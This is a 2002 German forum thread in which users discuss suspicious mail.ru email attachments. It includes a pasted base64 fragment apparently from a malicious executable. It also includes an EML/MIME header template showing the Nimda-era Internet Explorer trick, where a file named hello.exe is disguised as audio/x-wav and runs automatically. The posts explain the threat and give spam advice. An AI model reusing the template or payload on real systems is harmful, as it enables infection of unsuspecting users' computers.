BlackBoard (http://www.black-board.net/index.php)
- Computerecke (http://www.black-board.net/board.php?boardid=30)
-- Netzwerke/Telekommunikation (http://www.black-board.net/board.php?boardid=2)
--- Virus ? (http://www.black-board.net/thread.php?threadid=6967)
Geschrieben von HeaD am 24.08.2002 um 22:28:
Virus ?
Hi !
Ich bekomme im Moment mindestens einmal die Woche eine EMail mit Anhang. Genauso wird midestens einmal die Woche eine Email über meinen AOL Namen versendet.
Der Originalabsender ist jedesmal von irgendwas@mail.ru
Es sind immer 2 Dateien. Einmal Themen. wenn man sie sich ansieht ist es eine Pornoseite.
Und einmal eine Datei die so wie die ZipDatei heißt, mit der Endung .mim
Wenn man die anschaut steht da sowas:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IPsFItF
EFNWM/ZXM9uJdeyJdfiJRfA7dRAPjW8BAACLRfBqA1o7wolV9H0DiUX0i030uD09PT2Nffxm
q4XJqn4Vi0UIjX38A/CLwcHpAvOli8gjyvOkik38isHA6AKF24hF/3Qmi30Uhf9+J4vDi3UM
K0X4mff/hdJ1G8YEMw1DxgQzCkODRfgC6wuLdQyLfRTrA4t1DA+2Rf+LFTDgQACA4QPA4QSK
BBCIBDOKRf2K0EPA6gQCyoXbdCGF/34di8MrRfiZ9/+F0nUOxgQzDUPGBDMKQ4NF+AKKRf2L
FTDgQAAkDw+2ycDgAooMEYgMM4pN/orRQ8DqBgLChduIRf90HoX/fhqLwytF+Jn3/4XSdQ7G
BDMNQ8YEMwpDg0X4Ag+2Rf+LFTDgQACKBBCIBDNDg330An8FxkQz/z2A4T+F23Qehf9+GovD
K0X4mff/hdJ1DsYEMw1DxgQzCkODRfgCD7bBiw0w4EAAigQIiAQzQ4N99AF/BcZEM/89i3Xs
g8YDg23wA4l17OmI/v//X4vDXlvJw1WL7IHsEAEAAINl+ACNRfxQagRoRPJAAOh/IgAAWVlQ
aAIAAID/FVTQQACFwA+FtwAAAFNWV7tn+UAAUFPoiiIAAFmJRfRZjYXw/v//aAQBAABQ/3X4
/3X8/xVY0EAAhcB1e42F8P7//1Do4bEAADP/WTl99H5fV1PoHiIAAFCNhfD+//9Q6FopAACD
xBCFwHQ+aG/7QAD/FSjRQACL8IX2dC1qAmhv/EAA6O0hAABZWVBW/xUs0UAAhcB0DI2N8P7/
/1H/dfz/0Fb/FezQQABHO330fKH/Rfjpaf////91/P8VXNBAAF9eW8nDVYvsgewUCAAAjUUM...
..usw.
Und das so oft das die Datei 118 KB groß ist.
Ist das nen Virus oder was soll das sein ? Jemand ne Ahnung ??
Geschrieben von Der_Yeti am 02.09.2002 um 16:21:
Ich hab zwar keinen Plan was das füa ne datei ist, aber an deiner stelle wird ich sie niht öffnen....
Schreib doch mal ne mail an irgendwas@mail.ru und sag ihm er soll sich f.....(oder irgendwas anderes)
natürlich in enlisch, is ja ne russische adresse....
DerYeti
Geschrieben von Dj Math am 02.09.2002 um 19:30:
Jo ich habe auch oft solche E-Mails bekommen
mit *orno und so!
Jetzt hab ich mal zurück geschrieben das sie sich ihr scheis* *icker adresse in den *rsch Schieben soll!
Das ist jetzt fast 2 monate her,und seit dem ist auch nichts mehr gekommen! sonst kamm der mistimmer alle 2 tage oder sogar 2 mal am Tag!
Versuch es einfach mal zurück zu schreiben,vieleicht klappt es bei dir ja auch!
Geschrieben von Cr4sh_Ov3r_umc am 14.11.2002 um 23:22:
Hey HeaD
Hast du die Datei noch auf deinem PC??? Wenn ja kanst du sie mir schicken.. Ich glaube ich weiss was das ist. Nein das ist kein Virus. Du kannst aufatmen.
Bitte schicke sie wenn du sie noch hast
Mail
Gruss CrAsH
Geschrieben von CDW am 16.11.2002 um 16:24:
es kann auch ein EML anhabg sein, je nach Konfigurations des Systems kann man ein da drin "verstecktes" programm ausführen, das Verfahren ist eher bekannt als Nimda Virus, schau einfach mal unter
www.heise.de unter Browserchecks
Geschrieben von Fuchs am 16.11.2002 um 16:33:
Aber es bringt einen sch... zu antworten, da die adressen sowiso gefackt sind und net echt, oder einfach tote briefkasten sind. Naja neuen account machen lassen, du kannst dichts gegen die Porno E_Mail versender gmbh machen!
Geschrieben von zira am 17.11.2002 um 00:02:
Eml ?
1) Was ist der Datei Typ EML ?
2) was die verdächtigen Attachments betrifft, kann es nicht nur ein Virus, sondern aber vielleicht ein betrügerischer Dialer sein der den PC zum Internet-Einwählen über 0190 oder teure Auslandsnummer umkonfiguriert.
Geschrieben von phlox81 am 17.11.2002 um 01:11:
2 Sachen dazu.
NIEMALS AUF SPAM ANTWORTEN
denn, die meisten haben Antwortfilter laufen, dann
bekommst du erst recht Spam, mehr als dir lieb ist...
Zum anderen, wenn du nicht nach gefragt hast, mails mit
Attachments von unbekannten löschen, und bei Wiederholung
die email addy auf die Spam liste auf nehmen...
Devil
Geschrieben von CDW am 17.11.2002 um 11:47:
EML ist, wenn ich das noch richtig weiß, der Dateityp für Anhänge in Outlook, leider weiß auch der IE was damit anzufangen und lädt in version 5.x so eine EML automatisch nach, wenn diese in die Seite eingebunden wird... in EML sollte eigentlich kein schädlicher Code untergebracht werden, sondern Video/Audio dateien... da dumme daran ist, das Microschrott da wieder geschlampt hat... ich poste mal einen Header der Datei:
| code: |
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
|
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="hello.exe"
Content-Transfer-Encoding: base00
Content-ID: <EA4DMGBP9p>
|
|
wichtig ist der abschnitt:
| code: |
1:
2:
3:
4:
5:
|
Content-Type: audio/x-wav;
name="hello.exe"
Content-Transfer-Encoding: base00
Content-ID: <EA4DMGBP9p>
|
|
mit Content-Type gibt man an, das wäre eine Audiodatei, der name jedoch ist "hello.exe",das heißt, der nachfolgene Abschnitt danach wird in den Tempordner unter "hello.exe" entpackt und ausgeführt, ohne nachfrage... der Absender braucht bloß die EXE vorher mit einem Hexeditor zu öffnen und den Binärcode zu kopieren und einzufügen (also kaum verstand)...
Ab IE 6.0 oder nach entsprechenden patches fragt win jetzt, ob man die datei herunterladen möchte und öffnen, vorher wurde das ohne zustimmung gemacht!Das heiß, man brauchte GAR keinen Anhang zu öffnen und musste auch nicht zwangsweise Outlook nutzen, IE reichte schon aus
Forensoftware: Burning Board 2.3.6, entwickelt von WoltLab GmbH